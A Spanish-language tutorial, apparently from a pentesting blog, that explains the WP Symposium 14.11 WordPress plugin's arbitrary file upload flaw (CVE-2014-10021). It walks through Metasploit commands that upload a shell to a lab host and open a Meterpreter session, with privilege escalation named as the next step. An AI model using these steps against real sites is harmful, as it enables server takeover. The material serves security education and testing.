El Plugin WP Symposium para WordPress contiene una falla la cual permite a un atacante remoto ejecutar código arbitrario PHP. Esta falla existe debido a la inadecuada verificación y sanitización del script /wp-symposium/server/file_upload.php para los archivos subidos por un usuario. Subiendo un archivo .php, el sistema remoto colocará el archivo en una ruta accedible por el usuario. Haciendo una petición directa hacía el archivo subido se permitirá al atacante ejecutar el script con los privilegios del servidor web

Para la siguiente demostración se utilizará una el módulo de nombre “WordPress WP Symposium 14.11 Shell Upload” de Metasploit Framework.

Iniciar Metasploit Framework y buscar el módulo pertinente.

> search symposium

Indicamos a Metasploit Framework la utilización de módulo y se procede a listar sus opciones.

> use exploit/unix/webapp/wp_symposium_shell_upload
> show options

Se definen las opciones pertinentes para luego ejecutar el exploit. Considerar el uso del payload por defecto el cual será Meterpreter.

> set RHOST 192.168.0.XX
> set TARGETURI /wordpress-3.8.1/
> exploit

La vulnerabilidad se ha explotado satisfactoriamente y se tiene acceso al sistema en evaluación mediante una sesión con Meterpreter.

Dado el hecho de no controlar el sistema con un usuario privilegiado la siguiente acción será tratar de elevar o escalar privilegios.

Fuentes:

https://www.owasp.org/index.php/Unrestricted_File_Upload
http://osvdb.org/show/osvdb/116046
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10021
https://www.exploit-db.com/exploits/35778/
http://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_...